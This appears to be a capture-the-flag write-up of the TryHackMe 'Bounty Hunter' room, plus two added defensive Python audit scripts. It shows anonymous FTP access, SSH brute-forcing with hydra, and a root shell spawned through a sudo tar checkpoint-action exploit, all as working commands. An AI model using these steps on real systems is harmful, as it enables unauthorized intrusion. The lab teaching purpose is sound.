1. Introduction
Welcome back guys, today we will take on a new room from TryHackMe called Bounty Hunter. This is a Linux machine which is simply beginner friendly. The room contains only 1 task with 7 questions.
Our objective is to find the user's password and capture all the flags on the machine.
2. Enumeration
As always, enumeration is our main key, so let's scan the machine with nmap.
sudo nmap -sC -sV -T4 10.10.205.103
─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
└──╼ [★]$ sudo nmap -sC -sV -T4 -oA initial.nmap 10.10.205.103
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 23:27 IST
Nmap scan report for 10.10.205.103
Host is up (0.35s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
|_-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.70.156
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Here 3 ports are open.
21 : FTP
22 : SSH
80 : HTTP
From the nmap result we can see that this server allows anonymous FTP login, so let's check the FTP server of this machine.
ftp 10.10.205.103
─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
└──╼ [★]$ ftp 10.10.205.103
Connected to 10.10.205.103.
220 (vsFTPd 3.0.3)
Name (10.10.205.103
Yeah! We logged in to the FTP server successfully. On the FTP server we can see that two files are present: task.txt and locks.txt.
task.txt gives us the answer to question #3 of our task, and it's a username on that machine.
Lin
The second one, locks.txt, is a password list which will help us bruteforce the login.
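As an added example that is not part of the original write-up, here is a small Python parser for nmap's normal (-oN) output of the kind shown above. It pulls out each port with its state, version string and script results, keeps the file listing that ftp-anon prints, and then reports what a defender would want to fix first: the anonymous FTP share with the files it exposes, and the plaintext services. The sample text is a trimmed copy of the scan above; the regular expressions and the rules in exposures() are my own choices, not anything nmap provides.

```python
import re

# Constructed sample: a trimmed copy of the normal-format (-oN) nmap output
# shown earlier, reduced to the lines this parser cares about.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.205.103
Host is up (0.35s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
|_-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "21/tcp open  ftp     vsftpd 3.0.3" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| ftp-anon: ..." or "|_http-title: ..." -> script name, first line of its output
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")
# ls-style directory entries that ftp-anon prints under an anonymous share
LISTING_RE = re.compile(
    r"^\|_?\s*[-d][rwx-]{9}\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+\S+\s+(\S+)$"
)


def parse_nmap(text):
    """Return one dict per port line, with its NSE script output attached."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": {}, "files": []}
            ports.append(current)
            continue
        if current is None or not line.startswith("|"):
            continue  # script lines belong to the most recent port line
        m = LISTING_RE.match(line)
        if m:
            current["files"].append(m.group(1))
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current["scripts"][m.group(1)] = m.group(2)
    return ports


def exposures(ports):
    """Findings a defender would act on, as (port, description) tuples."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        anon = p["scripts"].get("ftp-anon", "")
        if "allowed" in anon:
            findings.append((p["port"], "anonymous FTP login allowed; exposed files: "
                             + ", ".join(p["files"])))
        if p["service"] in ("ftp", "http", "telnet"):
            findings.append((p["port"], f"{p['service']} carries credentials and data in plaintext"))
    return findings


if __name__ == "__main__":
    for port, why in exposures(parse_nmap(SAMPLE_NMAP)):
        print(f"{port}: {why}")
```

On the sample this prints the anonymous share on 21 (with locks.txt and task.txt named) and the two plaintext services. The fix on the server side is to disable anonymous access in vsftpd (or remove the service if it is not needed) and to make sure nothing like a password list is ever placed in a directory served to unauthenticated clients.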
3. Bruteforce
From nmap we saw another service running on port 22 of this machine, which is SSH,
so let's bruteforce this service with our password list locks.txt for the username lin using hydra.
hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103
─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
└──╼ [★]$ hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-14 00:18:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 15 tasks per 1 server, overall 15 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.205.103:22/
[22][ssh] host: 10.10.205.103   login: lin   password: R****************3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-14 00:19:08
Hydra did its work perfectly: it gives us the SSH password for this machine.
So we got the answer for question #5 of the task.
Now let's connect to this machine over SSH.
4. SSH Connection
So we got the username and password; now let's log in.
ssh lin@10.10.205.103
─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
└──╼ [★]$ ssh lin@10.10.205.103
The authenticity of host ‘10.10.205.103 (10.10.205.103)’ can’t be established.
ECDSA key fingerprint is SHA256
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
83 packages can be updated. 0 updates are security updates.
Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ whoami
lin
So we got access to the machine. Now let's check for our flags; first we will look for the user flag.
ls -l
lin@bountyhacker:~/Desktop$ cat user.txt
THM{C**_*******}
USER FLAG
THM{C**_*******}
Now question #6 is completed.
5. Privilege Escalation
So we got the user flag of this machine. Now let's look at how to get the root flag.
First let's check which commands our user lin can run with sudo on this machine.
It can be checked with the command
sudo -l
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
Our user lin can run tar with root permissions.
Without wasting time, let's jump to GTFOBins, which lists binaries whose built-in features can be used for escalation.
Let's search for tar.
From GTFOBins we learn that tar can also be used for escalation: its --checkpoint-action=exec option runs a command of the caller's choosing, and because sudo runs tar as root, that command runs as root too.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading / from member names
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
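The root cause here is the sudo rule itself: "(root) /bin/tar" with no restriction is, in effect, a root shell. As an added example that is not part of the original write-up, here is a small Python audit that parses the sudo -l output shown above and flags rules that grant root on a binary with a built-in way to run another program. The sample text is the output above plus two rules I invented so the other branches of the parser run; SHELL_ESCAPE_BINS is my own illustrative subset of GTFOBins' sudo entries, not an exhaustive list.

```python
import os
import re

# Constructed sample: the `sudo -l` output shown above for user lin, with two
# extra rules added here (they are not on the target) to exercise the parser.
SAMPLE_SUDO_L = """\
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOEXEC: /usr/bin/less
    (www-data) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# One rule line looks like "(runas) TAG: TAG: /path/to/command args".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)

# Illustrative subset (my selection) of binaries whose ordinary options can
# launch another program, so granting them as root equals granting a root
# shell. tar is the case above: --checkpoint-action=exec=... runs a command.
SHELL_ESCAPE_BINS = {"tar", "find", "vim", "vi", "less", "more", "awk",
                     "python", "python3", "perl", "env"}


def parse_sudo_l(text):
    """Return the per-command rules from `sudo -l` output as dicts."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_cmds = True        # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_cmds else None
        if m:
            tags = [t.rstrip(":") for t in m["tags"].split()]
            rules.append({"runas": m["runas"].strip(), "tags": tags, "cmd": m["cmd"]})
    return rules


def audit(rules):
    """Flag rules that hand out root: unrestricted ALL, or a shell-escape
    binary run as root without the NOEXEC tag."""
    findings = []
    for r in rules:
        # runas may be "root", "ALL" or "user : group"; only the user part matters here
        runs_as_root = r["runas"].split(":")[0].strip() in ("root", "ALL")
        if r["cmd"] == "ALL" and runs_as_root:
            findings.append((r["cmd"], "unrestricted root sudo"))
            continue
        binary = os.path.basename(r["cmd"].split()[0])
        if runs_as_root and binary in SHELL_ESCAPE_BINS and "NOEXEC" not in r["tags"]:
            findings.append((r["cmd"],
                             f"{binary} as root can spawn a shell; drop the rule or add NOEXEC"))
    return findings


if __name__ == "__main__":
    for cmd, why in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd}: {why}")
```

On the sample only "/bin/tar" is reported: the less rule carries NOEXEC, and the systemctl rule does not run as root. NOEXEC works by preloading a library that blocks the exec family of calls in the child, so it stops tar's --checkpoint-action=exec but protects only dynamically linked binaries; the more robust fix is to replace the blanket rule with a wrapper script that takes no caller-controlled arguments, or to drop the sudo grant entirely.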
Now we have root access. Let's check the root flag and see what's inside it.
cat /root/root.txt
# cat /root/root.txt
THM{8*****_******}
ROOT FLAG
THM{8*****_******}
Our last question, #7, for this task is now completed.
6. Conclusion
Yeah, the machine was really cool and helpful for learning.
Thanks.